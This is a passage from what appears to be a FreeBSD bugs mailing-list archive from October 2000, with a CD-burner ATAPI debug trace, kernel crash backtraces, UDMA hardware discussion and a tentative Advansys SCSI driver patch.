ccb = bb-00-ff-ff-00-b1-00-00-00-00-00-00-00-00-00-00 acd0: starting SET_SPEED ccb = bb-00-ff-ff-00-b1-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished SET_SPEED acd0: queueing MODE_SENSE_BIG ccb = 5a-00-05-00-00-00-00-00-3c-00-00-00-00-00-00-00 acd0: starting MODE_SENSE_BIG ccb = 5a-00-05-00-00-00-00-00-3c-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=60, h=0, s=0, count=0, feature=0, flags=01 acd0: finished MODE_SENSE_BIG acd: mode sense 00-3a-21-00-00-00-00-00-05-32-01-04-08-00-00-00-00-00-00-00-00-00-00-96-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd: modeselect pagesize=60 acd: mode select 00-3a-21-00-00-00-00-00-05-32-01-c4-08-00-00-00-00-00-00-00-00-00-00-96-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: queueing MODE_SELECT_BIG ccb = 55-10-00-00-00-00-00-00-3c-00-00-00-00-00-00-00 acd0: starting MODE_SELECT_BIG ccb = 55-10-00-00-00-00-00-00-3c-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=60, h=0, s=0, count=0, feature=0, flags=01 acd0: finished MODE_SELECT_BIG acd0: queueing READ_TRACK_INFO ccb = 52-01-00-00-00-ff-00-00-1c-00-00-00-00-00-00-00 acd0: starting READ_TRACK_INFO ccb = 52-01-00-00-00-ff-00-00-1c-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=28, h=0, s=0, count=0, feature=0, flags=01 acd0: finished READ_TRACK_INFO acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-00-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-00-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-10-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-10-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-20-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-20-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-30-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-30-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-40-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-40-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-50-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-50-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-60-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-60-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-70-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-70-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-80-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-80-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-90-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-90-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-a0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-a0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-b0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-b0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-c0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-c0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-d0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-d0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-e0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-e0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-00-f0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-00-f0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-00-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-00-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-10-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-10-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-20-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-20-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-30-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-30-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-40-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-40-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-50-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-50-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-60-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-60-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-70-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-70-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-80-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-80-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-90-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-90-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-a0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-a0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-b0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-b0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-c0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-c0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-d0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-d0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-e0-00-00-10-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-e0-00-00-10-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=32768, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing WRITE_BIG ccb = 2a-00-00-00-01-f0-00-00-01-00-00-00-00-00-00-00 acd0: starting WRITE_BIG ccb = 2a-00-00-00-01-f0-00-00-01-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=2048, h=0, s=0, count=0, feature=1, flags=01 acd0: finished WRITE_BIG (callback) acd0: queueing SYNCHRONIZE_CACHE ccb = 35-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting SYNCHRONIZE_CACHE ccb = 35-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished SYNCHRONIZE_CACHE acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished PREVENT_ALLOW # burncd -f /dev/acd0c fixate acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished PREVENT_ALLOW acd0: queueing TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished TEST_UNIT_READY acd0: queueing SET_SPEED ccb = bb-00-ff-ff-00-b1-00-00-00-00-00-00-00-00-00-00 acd0: starting SET_SPEED ccb = bb-00-ff-ff-00-b1-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished SET_SPEED acd0: queueing CLOSE_TRACK/SESSION ccb = 5b-00-02-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting CLOSE_TRACK/SESSION ccb = 5b-00-02-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: CLOSE_TRACK/SESSION command timeout - resetting ata0: resetting devices .. ata0: mask=01 status0=00 status1=7f ata0-master: ata_command: addr=01f0, cmd=ef, c=0, h=0, s=0, count=34, feature=3, flags=03 ata0-master: success setting WDMA2 on PIIX3 chip done acd0: starting CLOSE_TRACK/SESSION ccb = 5b-00-02-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: starting REQUEST_SENSE ccb = 03-00-00-00-12-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=18, h=0, s=0, count=0, feature=0, flags=01 acd0: finished REQUEST_SENSE acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished PREVENT_ALLOW >Fix: If I knew, I'd provide a fix ;-) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 2:20: 4 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 49B6837B479 for ; Mon, 30 Oct 2000 02:20:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA88512; Mon, 30 Oct 2000 02:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 30 Oct 2000 02:20:03 -0800 (PST) Message-Id: <200010301020.CAA88512@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Roman Shterenzon Subject: Re: kern/22103: 4.1-R with Adaptec and Vinum crashes on periodic daily Reply-To: Roman Shterenzon Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/22103; it has been noted by GNATS. From: Roman Shterenzon To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: kern/22103: 4.1-R with Adaptec and Vinum crashes on periodic daily Date: Mon, 30 Oct 2000 12:12:30 +0200 (IST) I took another dump today, it crashed in the same place: #63 0xc150fc67 in complete_rqe () at /usr/src/sys/modules/vinum/../../dev/vinum/vinuminterrupt.c:199 #64 0xc0178d6b in biodone (bp=0xc1caf820) at ../../kern/vfs_bio.c:2637 #65 0xc0126bb9 in dadone (periph=0xc14ca700, done_ccb=0xc184c800) at ../../cam/scsi/scsi_da.c:1246 --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 4:40:43 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from wizardsworks.org (unknown [208.178.176.216]) by hub.freebsd.org (Postfix) with ESMTP id 79E3F37B4C5 for ; Mon, 30 Oct 2000 04:40:41 -0800 (PST) Received: from localhost (robin@localhost) by wizardsworks.org (8.10.2/8.10.2) with ESMTP id e9UCn4e00640 for ; Mon, 30 Oct 2000 04:49:04 -0800 Date: Mon, 30 Oct 2000 04:49:04 -0800 (PST) From: To: bugs@freebsd.org Subject: Netscape crash Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org O/S: FreeBSD-4.0/i386 Whilst using the netscape package supplied with FBSD-4.0 CDROM (Netscape Lite 4.08/Export, 02-Nov-98), on a PPP link, I am experiencing O/S crashes. The crashes have happened about 2 or 3 times thus far. The crash happens during a hotmail.com session. The crash looks like: Machine hangs for 1 or 2 seconds followed by a reboot. Cheers ... -- Think "Dinosaur" and "Mars Face, Second Edition". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 5:37:25 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from kamidake.apricot.com (kamidake.apricot.com [64.121.160.36]) by hub.freebsd.org (Postfix) with ESMTP id E25F637B479 for ; Mon, 30 Oct 2000 05:37:18 -0800 (PST) Received: (from toddpw@localhost) by kamidake.apricot.com (8.8.8/8.8.8) id FAA12296; Mon, 30 Oct 2000 05:35:47 -0800 (PST) From: "Todd P. Whitesel" Message-Id: <200010301335.FAA12296@kamidake.apricot.com> Subject: Re: i386/22240: unstable UDMA on Iwill VD133PL v1.6 (Apollo MVP3, IDE rev 0x10) In-Reply-To: <20001027160008.A13670@nagual.pp.ru> from "[______ ______]" at "Oct 27, 0 04:00:09 pm" To: ache@nagual.pp.ru (=?koi8-r?B?4c7E0sXKIP7F0s7P1w==?=) Date: Mon, 30 Oct 2000 05:35:47 -0800 (PST) Cc: toddpw@apricot.com, sos@freebsd.dk, freebsd-bugs@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I end up with ASUS CUSL2 (815E) motherboard witch works fine with the same > memory/processor was not working with VIA Same here. I have been testing a pair of CUSL2's for over a day with no problems whatsoever. Is there a PR category for "known buggy hardware" ??? -- Todd Whitesel Anime Expo Information at toddpw @ apricot.com http://www.anime-expo.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 5:50: 6 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 871B037B4E5 for ; Mon, 30 Oct 2000 05:50:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA76044; Mon, 30 Oct 2000 05:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 2933937B479; Mon, 30 Oct 2000 05:40:56 -0800 (PST) Message-Id: <20001030134056.2933937B479@hub.freebsd.org> Date: Mon, 30 Oct 2000 05:40:56 -0800 (PST) From: adam@algroup.co.uk To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/22417: advansys wide scsi driver does not support more than 7 drives Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22417 >Category: kern >Synopsis: advansys wide scsi driver does not support more than 7 drives >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 30 05:50:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Adam Laurie >Release: 4.1.1-STABLE >Organization: A.L. Digital Ltd. >Environment: FreeBSD tobermory 4.1.1-STABLE FreeBSD 4.1.1-STABLE #0: Fri Oct 20 13:12:24 GMT 2000 root@tobermory:/usr/src/sys/compile/TOBERMORY i386 >Description: it appears that advansys ultra2 scsi controller (tested with model ASB3940U2W) code is hardwired to 3 bit SCSI IDs, causing hangup during boot if more than 3 bits worth of drives are present (or, presumably, any drive with an id higher than 7). dmesg: adw0: port 0xd800-0xd8ff mem 0xff8ffc00-0xff8ffcff irq 9 at device 11.0 on pci1 adw0: SCSI ID 0, High & Low SE Term Enabled, LVD Term Enabled, Queue Depth 253 (yes, I know having it set to SCSI id 0 is weird, but we have to because of the way the external drive chassis autonumbers). >How-To-Repeat: attach more than 7 scsi drives to an advansys controller. >Fix: the following patch was our attempt at a quick fix, which didn't work, but it's a start... :) bash-2.03$ diff -u /usr/src/sys/dev/advansys/advlib.h.orig /usr/src/sys/dev/advansys/advlib.h --- /usr/src/sys/dev/advansys/advlib.h.orig Fri Oct 20 12:56:52 2000 +++ /usr/src/sys/dev/advansys/advlib.h Mon Oct 30 10:56:14 2000 @@ -54,8 +54,8 @@ typedef u_int8_t target_bit_vector; #define TARGET_BIT_VECTOR_SET -1 -#define ADV_SCSI_ID_BITS 3 -#define ADV_MAX_TID 7 +#define ADV_SCSI_ID_BITS 4 +#define ADV_MAX_TID 15 #define ADV_MAX_LUN 7 /* Enumeration of board types */ @@ -297,7 +297,7 @@ #define EEPROM_SET_SCSIID(ep, id) \ (ep).scsi_id_dma_speed &= ~EEPROM_SCSI_ID_MASK; \ (ep).scsi_id_dma_speed |= ((id) & EEPROM_SCSI_ID_MASK) - u_int8_t sdtr_data[8]; + u_int8_t sdtr_data[ADV_MAX_TID+1]; u_int8_t adapter_info[6]; u_int16_t cntl; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 5:50:10 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freebsd.dk (freebsd.dk [212.242.42.178]) by hub.freebsd.org (Postfix) with ESMTP id 3ACEE37B4FE for ; Mon, 30 Oct 2000 05:50:06 -0800 (PST) Received: (from sos@localhost) by freebsd.dk (8.9.3/8.9.1) id OAA10884; Mon, 30 Oct 2000 14:48:44 +0100 (CET) (envelope-from sos) From: Soren Schmidt Message-Id: <200010301348.OAA10884@freebsd.dk> Subject: Re: i386/22240: unstable UDMA on Iwill VD133PL v1.6 (Apollo MVP3, IDE rev 0x10) In-Reply-To: <200010301335.FAA12296@kamidake.apricot.com> from "Todd P. Whitesel" at "Oct 30, 2000 05:35:47 am" To: toddpw@apricot.com (Todd P. Whitesel) Date: Mon, 30 Oct 2000 14:48:43 +0100 (CET) Cc: ache@nagual.pp.ru ([______ ______]), freebsd-bugs@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It seems Todd P. Whitesel wrote: > > I end up with ASUS CUSL2 (815E) motherboard witch works fine with the same > > memory/processor was not working with VIA > > Same here. I have been testing a pair of CUSL2's for over a day with no > problems whatsoever. > > Is there a PR category for "known buggy hardware" ??? I just had a mail from somebody that solved a VIA problem by overclocking the FSB, he found that in some FAQ somewhere, go figure..... Again I have run all kinds of tests on the VIA's I have access to, and none of themm have shown any problems, it could be bad MB designs too... -Søren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 7:20: 5 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2658737B479; Mon, 30 Oct 2000 07:20:04 -0800 (PST) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA13553; Mon, 30 Oct 2000 07:20:04 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 30 Oct 2000 07:20:04 -0800 (PST) From: Message-Id: <200010301520.HAA13553@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: kern/22405: installworld still bombs on perl and other packages Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: installworld still bombs on perl and other packages Responsible-Changed-From-To: freebsd-bugs->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Mon Oct 30 07:19:10 PST 2000 Responsible-Changed-Why: If this makes it through a ``make world'' tonight (which it should, since none of these programs rely on any weird dependencies), I'll be able to commit the patch in time for 4.2-RELEASE. Thanks! http://www.freebsd.org/cgi/query-pr.cgi?pr=22405 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 8:41:20 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from genius.systems.pavilion.net (genesis.tao.org.uk [194.242.131.254]) by hub.freebsd.org (Postfix) with ESMTP id D0B0437B479 for ; Mon, 30 Oct 2000 08:41:17 -0800 (PST) Received: by genius.systems.pavilion.net (Postfix, from userid 100) id CC7619B12; Mon, 30 Oct 2000 16:44:48 +0000 (GMT) Date: Mon, 30 Oct 2000 16:44:48 +0000 From: Josef Karthauser To: Roman Shterenzon Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/22103: 4.1-R with Adaptec and Vinum crashes on periodic daily Message-ID: <20001030164448.E16053@pavilion.net> References: <200010301020.CAA88512@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010301020.CAA88512@freefall.freebsd.org>; from roman@xpert.com on Mon, Oct 30, 2000 at 02:20:03AM -0800 X-NCC-RegID: uk.pavilion Organisation: Pavilion Internet plc, Lees House, 21-23 Dyke Road, Brighton, England Phone: +44-845-333-5000 Fax: +44-845-333-5001 Mobile: +44-403-596893 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 30, 2000 at 02:20:03AM -0800, Roman Shterenzon wrote: > The following reply was made to PR kern/22103; it has been noted by GNATS. > > From: Roman Shterenzon > To: freebsd-gnats-submit@FreeBSD.org > Cc: > Subject: Re: kern/22103: 4.1-R with Adaptec and Vinum crashes on periodic > daily > Date: Mon, 30 Oct 2000 12:12:30 +0200 (IST) > > I took another dump today, it crashed in the same place: > > #63 0xc150fc67 in complete_rqe () at /usr/src/sys/modules/vinum/../../dev/vinum/vinuminterrupt.c:199 #64 0xc0178d6b in biodone (bp=0xc1caf820) at ../../kern/vfs_bio.c:2637 > #65 0xc0126bb9 in dadone (periph=0xc14ca700, done_ccb=0xc184c800) at ../../cam/scsi/scsi_da.c:1246 I believe that this is the same problem as I've detailed in kern/21915. I'm currently setting up a remote debugging environment and speaking with Greg (vinum author) so that we can get it tracked down. I've got three unusable machines because of this bug. Joe -- Josef Karthauser FreeBSD: How many times have you booted today? Technical Manager Viagra for your server (http://www.uk.freebsd.org) Pavilion 